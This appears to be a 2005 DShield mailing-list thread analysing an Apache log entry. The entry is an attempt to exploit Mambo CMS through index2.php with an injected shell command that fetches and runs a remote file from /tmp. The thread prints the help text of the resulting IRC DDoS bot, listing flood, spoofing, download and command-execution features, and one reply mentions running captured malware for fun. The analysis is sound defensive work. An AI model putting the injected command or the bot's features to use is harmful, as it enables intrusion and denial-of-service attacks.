[Dshield] Can Someone Decipher This Log Entry?
eslerj at gmail.com
Thu Dec 22 12:41:37 GMT 2005
Stephanie -- Excellent Analysis.
Short end of the stick... I've seen tons of these hit my machine
lately, and I usually download the code and let it connect just for
fun.. (oh yeah, then I tell #dshield about it in irc.freenode.net
and it usually gets shut down post haste)
it's an IRC connector/remote shell client thingy (i know that's
technical) for botnet usage. I have about 4 different types on my
machine in a folder called "fun".
On Dec 22, 2005, at 5:30 AM, Stephane Grobety wrote:
> Hello David,
> I've masked part of the IP you provided in your message, just in case
> in case. It's a bit silly considering you didn't do the same, but,
> well, it does no additional harm...
> it looks like that this is an attempt to exploit a flaw in the Mambo
> content management software (looks like it's this one:
> If the exploit succeeds, it will try to wget a file called "micu" from
> XXX.136.48.69 into the /tmp folder and execute it.
> At this moment, that server is still serving the file so I checked it.
> What it does is try to download and execute two more files: "mare"
> and "ro"
> "mare" isn't available on the remote server but "ro" is. it looks like
> an ELF executable. Now, I'm not a specialist of that file format so
> I may be completely wrong here but this looks like a Linux x86
> executable file. It seems to link the /lib/ld-linux.so.2 library and
> import a bunch of functions that you expect from a IP server program.
> It also contains a number of strings that indicates that it might try
> to contact an IRC server (*.undernet.org). It also has a nice internal
> help that is probably intended to be used by the attacker:
> NOTICE %s :Current status is: %s.
> NOTICE %s :Already disabled.
> NOTICE %s :Password too long! > 254
> NOTICE %s :Disable sucessful.
> NOTICE %s :ENABLE <pass>
> NOTICE %s :Already enabled.
> NOTICE %s :Wrong password
> NOTICE %s :Password correct.
> NOTICE %s :Removed all spoofs
> NOTICE %s :What kind of subnet address is that? Do something like:
> NOTICE %s :Unable to resolve %s
> NOTICE %s :UDP <target> <port> <secs>
> NOTICE %s :Packeting %s.
> NOTICE %s :PAN <target> <port> <secs>
> NOTICE %s :Panning %s.
> NOTICE %s :TSUNAMI <target> <secs>
> NOTICE %s :Tsunami heading for %s.
> NOTICE %s :UNKNOWN <target> <secs>
> NOTICE %s :Unknowning %s.
> NOTICE %s :MOVE <server>
> NOTICE %s :TSUNAMI <target> <secs> =
> Special packeter that wont be blocked by most firewalls
> NOTICE %s :PAN <target> <port> <secs> = An
> advanced syn flooder that will kill most network drivers
> NOTICE %s :UDP <target> <port> <secs> = A udp
> NOTICE %s :UNKNOWN <target> <secs> =
> Another non-spoof udp flooder
> NOTICE %s :NICK <nick> =
> Changes the nick of the client
> NOTICE %s :SERVER <server> =
> Changes servers
> NOTICE %s :GETSPOOFS = Gets
> the current spoofing
> NOTICE %s :SPOOFS <subnet> =
> Changes spoofing to a subnet
> NOTICE %s :DISABLE =
> Disables all packeting from this client
> NOTICE %s :ENABLE =
> Enables all packeting from this client
> NOTICE %s :KILL = Kills
> the client
> NOTICE %s :GET <http address> <save as> =
> Downloads a file off the web and saves it onto the hd
> NOTICE %s :VERSION =
> Requests version of client
> NOTICE %s :KILLALL = Kills
> all current packeting
> NOTICE %s :HELP =
> Displays this
> NOTICE %s :IRC <command> = Sends
> this command to the server
> NOTICE %s :SH <command> =
> Executes a command
> NOTICE %s :Killing pid %d.
> So what this looks like is a client for a DDoS botnet.
> Other entries in the program seems to indicate it's been compiled on a
> Debian system:
> There is also something that looks very much like an HTTP request:
> GET /%s HTTP/1.0
> Connection: Keep-Alive
> User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
> Host: %s:80
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/
> png, */*
> Accept-Encoding: gzip
> Accept-Language: en
> Accept-Charset: iso-8859-1,*,utf-8
> It would be interesting to see if the request matches your log entry:
> I think the above request is part of the exploit code.
> I did a bit of google research and found several DDoS client that are
> apparently based on the same code that contains the same string
> That's all I can say about this... The attacker is still up and
> running and probably still scanning networks trying to drop it's
> Good luck,
> Wednesday, December 21, 2005, 10:53:14 PM, you wrote:
> DCH> I have about 25 of these today. I've added index2.php to the
> firewall watcher.
> DCH> I cannot make sense of this Apache print:
> DCH> 18.104.22.168 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?
> micu;echo%20YYY;echo| HTTP\x01.1" 200 21 "-"
> Best regards,
> Stephane mailto:security at admin.fulgan.com
> Learn about Intrusion Detection in Depth from the comfort of your
> own couch:
> send all posts to list at lists.dshield.org
> To change your subscription options (or unsubscribe), see: http://
More information about the list